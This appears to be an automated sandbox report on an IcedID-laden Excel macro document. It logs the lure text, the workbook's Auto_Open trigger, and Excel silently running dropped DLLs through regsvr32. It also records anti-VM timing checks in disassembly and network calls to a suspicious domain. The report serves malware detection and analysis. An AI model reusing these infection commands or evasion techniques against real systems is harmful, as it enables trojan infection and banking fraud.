Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic-china.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d2908q01vomqb2.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://dftu77xade0tc.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://dgen8gghn3u86.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://dk261l6wntthl.cloudfront.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://download.stormacq.com/aws/podcast/
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://dpm.demdex.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://dts.podtrac.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://f0.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://img.youtube.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://marketingplatform.google.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://media.amazonwebservices.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085209409.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://p.adsymptotic.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2089982082.0000000002BA3000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
Source: regsvr32.exe, 00000004.00000002.2089982082.0000000002BA3000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1S9KTMR8MSDY7X19T47NJX-Content-Ty
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://prod.log.shortbread.aws.dev
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://prod.tools.shortbread.aws.dev
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-static.libsyn.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://static-cdn.jtvnw.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://static.doubleclick.net
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/awscloud
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://website.spot.ec2.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.jobs/aws
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://www.buzzsprout.com;
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://www.linkedin.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitch.tv/aws
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube-nocookie.com;
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://yt3.ggpht.com;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

E-Banking Fraud:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 3024, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0	Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1	Screenshot OCR: Enable Content button from the yellow bar above

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_021A1678 NtQuerySystemInformation,RtlAllocateHeap,

4_2_021A1678

Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_021A1810	4_2_021A1810
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB15D0	4_2_000007FEF8FB15D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_000007FEF8FB41BF	4_2_000007FEF8FB41BF

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
Source: Joe Sandbox View	Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>

Source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.regsvr32.exe.21a0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 00000004.00000002.2088537006.0000000000110000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240

Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$List-4527768.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC5BE.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: List-4527768.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: List-4527768.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: List-4527768.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: List-4527768.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: XTOWN.dll.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85
Source: lsdfik[1].fml.0.dr	Static PE information: real checksum: 0x1baf8 should be: 0x19d85

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\XTOWN.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\XTOWN.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_021A1E50

4_2_021A1E50

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000021A1E71 second address: 00000000021A1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000021A1EAB second address: 00000000021A1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_021A2434 rdtsc

4_2_021A2434

Source: C:\Windows\System32\regsvr32.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

4_2_021A27BC

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml

Jump to dropped file

Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_021A2434 rdtsc

4_2_021A2434

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 13.225.75.73 187	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Domain query: astrocycle.download
Source: C:\Windows\System32\regsvr32.exe	Domain query: aws.amazon.com
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.67.213.115 80	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4_2_021A22DC LookupAccountNameW,

4_2_021A22DC

Stealing of Sensitive Information:

Yara detected IcedID

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
